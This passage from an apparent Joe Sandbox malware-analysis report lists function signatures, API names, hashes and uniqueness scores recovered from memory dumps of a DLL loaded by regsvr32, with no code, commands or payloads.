                                                                                                                • Instruction Fuzzy Hash: 629191B260578181EB04DF65E488B6D63A6FB45F88FC84039DB4E5BA59DFBCE498C340
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.11%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileTime$Type$DateLocalPointerSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 60630809-0
                                                                                                                • Opcode ID: 70c6cab5f16cca9745b01a90833aea3d3db4b75c5027ce7f1a7283270f20e5cf
                                                                                                                • Instruction ID: 8fe120f2adce9b62a3dcc77b3c6155999c40123cbcd31e7f3fb6159e470a418d
                                                                                                                • Opcode Fuzzy Hash: 70c6cab5f16cca9745b01a90833aea3d3db4b75c5027ce7f1a7283270f20e5cf
                                                                                                                • Instruction Fuzzy Hash: C1317E72618B81C6D740CF69E44076D37A5FB48B94FA40139EA8E87BA8EF7DD44AC740
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 6.12%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _set_statfp
                                                                                                                • String ID:
                                                                                                                • API String ID: 1156100317-0
                                                                                                                • Opcode ID: c902975294a9a38ecb5eca0a1e3ae436a1099dbab301c27d42672f7cead63c39
                                                                                                                • Instruction ID: c07b8cbbc859ce54678ed82641d0bb760a57ae88c295cba98ad9a09310113452
                                                                                                                • Opcode Fuzzy Hash: c902975294a9a38ecb5eca0a1e3ae436a1099dbab301c27d42672f7cead63c39
                                                                                                                • Instruction Fuzzy Hash: 481160E2E58A1203FA6499A8D851B753240BF55360F8D063CE96FEA2D6CEEC788DC110
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.74%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 1452528299-0
                                                                                                                • Opcode ID: 3ff1776f0afbc60ebf3ef587da75c75d57013dd0a0c614141f7557c7420f971b
                                                                                                                • Instruction ID: 2785ebd2132679ee6fc58ea4334f72a464e287ab9aaeb1466b03f04d5eb86efc
                                                                                                                • Opcode Fuzzy Hash: 3ff1776f0afbc60ebf3ef587da75c75d57013dd0a0c614141f7557c7420f971b
                                                                                                                • Instruction Fuzzy Hash: F51139A0E1924282F954DB619910B392655BF44790F9C463CDD2FEB7D6DEECF449CB00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.29%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                • API String ID: 3215553584-1196891531
                                                                                                                • Opcode ID: 2a21a7119c3abbc62120d6b20015d757fb432afc87c57eb727d89c84f3e64afb
                                                                                                                • Instruction ID: 28309b09c17fc70831cf276e2bb88795fdf40ae17202dfeb0bf4423d73b5cdac
                                                                                                                • Opcode Fuzzy Hash: 2a21a7119c3abbc62120d6b20015d757fb432afc87c57eb727d89c84f3e64afb
                                                                                                                • Instruction Fuzzy Hash: 3A815EE3D0825287FF76CEA58150B7836A0BB11B44FDD8039DA0BE7285CAADF949D701
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 4.01%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                • String ID: MOC$RCC
                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                • Opcode ID: 4e01fa3ee231a06c343f71608dc3e69df44d15f0f733f4aed609b78be9fcc6f4
                                                                                                                • Instruction ID: bde9f17f088841eee22999a6b0707a49c3d1a0f4b6a23d1c79df12133383e6b4
                                                                                                                • Opcode Fuzzy Hash: 4e01fa3ee231a06c343f71608dc3e69df44d15f0f733f4aed609b78be9fcc6f4
                                                                                                                • Instruction Fuzzy Hash: BB9192B3A087818AE710CBA4E4407AD7BA4F744788F54452EEE8E6B755DF7CE19AC700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • 890367f6564d5d34cd008765d87fa7b5b98cdb1f7904696d90a06637df9007823e0f5d98fa86e8ed102097c62e61f673caf8af690f731e1ae7d21135de9672f14f, xrefs: 00007FF983D9859D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$ByteCharMultiWide
                                                                                                                • String ID: 890367f6564d5d34cd008765d87fa7b5b98cdb1f7904696d90a06637df9007823e0f5d98fa86e8ed102097c62e61f673caf8af690f731e1ae7d21135de9672f14f
                                                                                                                • API String ID: 469901203-4124513118
                                                                                                                • Opcode ID: b506b30d9deed56fd26a2eb93feb2d1d91e1310002705e1b3193b8cbb5916c20
                                                                                                                • Instruction ID: 6f0b1d7337d69ada6ad1b70aaa95cde2bbd545456462216ca74dccefd0beb0fe
                                                                                                                • Opcode Fuzzy Hash: b506b30d9deed56fd26a2eb93feb2d1d91e1310002705e1b3193b8cbb5916c20
                                                                                                                • Instruction Fuzzy Hash: E351E7A2B1568198EB00DFF5D0447AC2761FB05B98F848139EE1EABBD9DE7CE149C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • 1517069f017ffb28667302e58ad77fca2505339eafe02b33652665b40ee9a65c7c596ac6f3bd756f397a489923c48b71547244ebda945f47172016c67491df2106, xrefs: 00007FF983D987DD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$ByteCharMultiWide
                                                                                                                • String ID: 1517069f017ffb28667302e58ad77fca2505339eafe02b33652665b40ee9a65c7c596ac6f3bd756f397a489923c48b71547244ebda945f47172016c67491df2106
                                                                                                                • API String ID: 469901203-501322296
                                                                                                                • Opcode ID: a3ca9fbf11681a267bfd6786acdfa842ba53b32208013c012f2ada84cfde4e1a
                                                                                                                • Instruction ID: 2d94da7aee74a099d830af6bcdccb83df2ae4844ac60a67a4599c80bc4a7b81d
                                                                                                                • Opcode Fuzzy Hash: a3ca9fbf11681a267bfd6786acdfa842ba53b32208013c012f2ada84cfde4e1a
                                                                                                                • Instruction Fuzzy Hash: 7D51C8E2B1568198EB00DFB5D0447AC2761FB45B98F848139EE5DA7BD9DE7CE149C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID: $*
                                                                                                                • API String ID: 3215553584-3982473090
                                                                                                                • Opcode ID: c5ba4a7307209a58e5633475c8d9a203ba91463100d76d49df4e6dc230a4d0e5
                                                                                                                • Instruction ID: 3866bc955548020f88fbb3a636cc6a6302c1d858b0509332616bfa2c6043d89f
                                                                                                                • Opcode Fuzzy Hash: c5ba4a7307209a58e5633475c8d9a203ba91463100d76d49df4e6dc230a4d0e5
                                                                                                                • Instruction Fuzzy Hash: 5361A7B290C25286E768CF68A05467C3BA5FB05B44F9C113DD64BAB299DFECF449C740
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.98%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • d4738a02b928335e7de46b0526c11f9183997d5a878197adfe3f304d5da8, xrefs: 00007FF983D9131D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$InfoNativeSystem
                                                                                                                • String ID: d4738a02b928335e7de46b0526c11f9183997d5a878197adfe3f304d5da8
                                                                                                                • API String ID: 836507568-2598894011
                                                                                                                • Opcode ID: cb4f9efdb94993f52e66ea779711eb4b800018054d1b475db54c6e0402241d7d
                                                                                                                • Instruction ID: 26bc366472c344c149c7132db06e319430e78a7852a0f99869045700f266b41b
                                                                                                                • Opcode Fuzzy Hash: cb4f9efdb94993f52e66ea779711eb4b800018054d1b475db54c6e0402241d7d
                                                                                                                • Instruction Fuzzy Hash: 0F4198A2B1878181EA10DB68E48476D6361FB857E0F945239EA9D57BE9DFBCF084C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • 3045443075ddbbdebebb3d93ee53ffaa15345d480de23dce55ded12697e12eb6e28aebebac158378f67f26985330fc32, xrefs: 00007FF983D91EDB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LocalTime
                                                                                                                • String ID: 3045443075ddbbdebebb3d93ee53ffaa15345d480de23dce55ded12697e12eb6e28aebebac158378f67f26985330fc32
                                                                                                                • API String ID: 481472006-537308821
                                                                                                                • Opcode ID: a9826593b9e87ded50ee66cd7cf85ffefca9b60050b2ed3906b2b0f5418a62bf
                                                                                                                • Instruction ID: dfddf2e5b6ae40ae09c13aba1c172f055f5f6949250c1d97bdf8eecac2fc4deb
                                                                                                                • Opcode Fuzzy Hash: a9826593b9e87ded50ee66cd7cf85ffefca9b60050b2ed3906b2b0f5418a62bf
                                                                                                                • Instruction Fuzzy Hash: 0941BF72A1878185E700CFA1E4407AE73B5F784794F804229EE8DA7A98DFBCE154CB80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo$_get_daylight
                                                                                                                • String ID:
                                                                                                                • API String ID: 72036449-0
                                                                                                                • Opcode ID: 6dd91ec7018cd3d03dd38f34976e1d3839a928ce2cc03b79f6f8a5dee0fa9b4c
                                                                                                                • Instruction ID: e862ccf5119d4b235a9b86f36677157e7588b92a3fc6b528c952be10a314ff23
                                                                                                                • Opcode Fuzzy Hash: 6dd91ec7018cd3d03dd38f34976e1d3839a928ce2cc03b79f6f8a5dee0fa9b4c
                                                                                                                • Instruction Fuzzy Hash: 5C51C0B2D0821287F768C9E89401B797A50BB41794F9D403DDA0FE72E6CAACF94AD641
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 1.44%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CodeErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 850174997-0
                                                                                                                • Opcode ID: d97a25a01474b72a61f8f311287919af70fd99a873e25c07a582ba64e3cc96a4
                                                                                                                • Instruction ID: 4ba6755a71972962ea9d7b826a5c17896d101aef67896b2530dc7a6b3b1ed50a
                                                                                                                • Opcode Fuzzy Hash: d97a25a01474b72a61f8f311287919af70fd99a873e25c07a582ba64e3cc96a4
                                                                                                                • Instruction Fuzzy Hash: EF415AB2A15642C6EB14CF51D504B3963A8FB48F98F494439DE5E97788EF7CE848C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FilePointer$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 142388799-0
                                                                                                                • Opcode ID: 51c5d0b0d340aa6278112220f9dd4920b96edda5edc0a1a51ae440398d5ccfb2
                                                                                                                • Instruction ID: 4153e7f9036cf64150d988fc85c0e57e3af725976651beb781147a057abc81e7
                                                                                                                • Opcode Fuzzy Hash: 51c5d0b0d340aa6278112220f9dd4920b96edda5edc0a1a51ae440398d5ccfb2
                                                                                                                • Instruction Fuzzy Hash: 452189A2A1864281EB20DB65A840B797761BB44BA0FDC0335D56FE77D4CEBCF449C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.24%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2933794660-0
                                                                                                                • Opcode ID: 537f7fe44056394cfc0ecc6bbd4777fa352585b1e7579073a78de3d85b9564f2
                                                                                                                • Instruction ID: 1bf0a0deb85c8148b19ff44d65850950c1ff6b7216d7be70f3cff29098e5b113
                                                                                                                • Opcode Fuzzy Hash: 537f7fe44056394cfc0ecc6bbd4777fa352585b1e7579073a78de3d85b9564f2
                                                                                                                • Instruction Fuzzy Hash: 8E115162A04F418AEF10CF60E8547B433A4FB1D758F891A35EA5D86794DF7CE1A8C740
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.05%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 215268677-0
                                                                                                                • Opcode ID: 0019742395aee970d180fa3dd4f0a02abbafaf5f1e0ba7b51a21258ee040976e
                                                                                                                • Instruction ID: 4f39c72d79b927dbbd6a1f34b89a2ecc5a22813daf20283bf82e41ab698e0fd7
                                                                                                                • Opcode Fuzzy Hash: 0019742395aee970d180fa3dd4f0a02abbafaf5f1e0ba7b51a21258ee040976e
                                                                                                                • Instruction Fuzzy Hash: B90144B1619681D7EB40DF60E494BAAB3B0FB84B44F845139EA4F97624DF7CE448CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.11%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: __except_validate_context_record
                                                                                                                • String ID: csm$csm
                                                                                                                • API String ID: 1467352782-3733052814
                                                                                                                • Opcode ID: 36ffa24156ef67850ce43c3d3424e815371ab658b65586de8c56cd910bd32f05
                                                                                                                • Instruction ID: 2af072a631b8a8fe758558ab1ea92e8a6e68a9ba4cb3e5c73abda6c78ec21ea2
                                                                                                                • Opcode Fuzzy Hash: 36ffa24156ef67850ce43c3d3424e815371ab658b65586de8c56cd910bd32f05
                                                                                                                • Instruction Fuzzy Hash: E071C5B250868286D760CF659040B7E7BA4FB50F85F888539EE4EAB785CE6CF496C740
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID: e+000$gfff
                                                                                                                • API String ID: 3215553584-3030954782
                                                                                                                • Opcode ID: 10a3ef1d052316caaaaee41695669b900b3bcf0be50960d7c2ffc76df5b4546d
                                                                                                                • Instruction ID: 03373e7bbd68ab0fb8e9d108a5ba869fa5da63ee48fdc8f02b93dd1d32a18d6c
                                                                                                                • Opcode Fuzzy Hash: 10a3ef1d052316caaaaee41695669b900b3bcf0be50960d7c2ffc76df5b4546d
                                                                                                                • Instruction Fuzzy Hash: 4B5138A2B186C186E724CF7598417697B91FB80B90F8C9239C79D9BBD5CE6CF449C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 1.11%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                                • String ID: csm
                                                                                                                • API String ID: 2558813199-1018135373
